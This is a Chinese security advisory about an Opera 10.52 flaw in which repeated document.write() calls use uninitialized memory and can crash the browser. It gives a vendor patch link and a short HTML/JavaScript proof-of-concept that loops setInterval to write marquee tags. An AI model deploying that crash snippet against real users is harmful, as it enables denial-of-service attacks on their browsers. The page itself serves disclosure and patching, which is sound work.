发布日期:2010-04-27
更新日期:2010-04-29受影响系统:
Opera Software Opera 10.52
描述:
--------------------------------------------------------------------------------
Opera是一款流行的WEB浏览器,支持多种平台。Opera浏览器在使用document.write()函数连续向页面写入内容时存在错误,用户受骗访问了恶意网页就可以导致使用未初始化的内存,浏览器可能会崩溃。<*来源:Mathias Karlsson
链接:http://secunia.com/advisories/39590/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html> <script> loop(); function loop() { setInterval(doit,0); } function doit() { var b="<marquee>"; document.write(b); setInterval(loop,0); } </script> </html>建议:
--------------------------------------------------------------------------------
厂商补丁:Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://my.opera.com/desktopteam/blog/2010/04/28/opera-10-53-rc1-for-windows-and-macX.Org X Server RENDER扩展mod()宏远程内存破坏漏洞PHP php_dechunk() HTTP分块编码整数溢出漏洞相关资讯 Opera
- Opera服务器遭到入侵 (今 06:14)
- Opera 37 beta 更新,增加视频弹出 (04月22日)
- Opera CEO强调是股东而不是他们想 (02月26日)
| - Opera 准备以 6 亿美元之价将部分 (07月19日)
- Opera浏览器将内置广告屏蔽 (03月11日)
- 奇虎 360、昆仑万维欲以 12 亿美元 (02月11日)
|
本文评论 查看全部评论 (0)
易网时代-编程资源站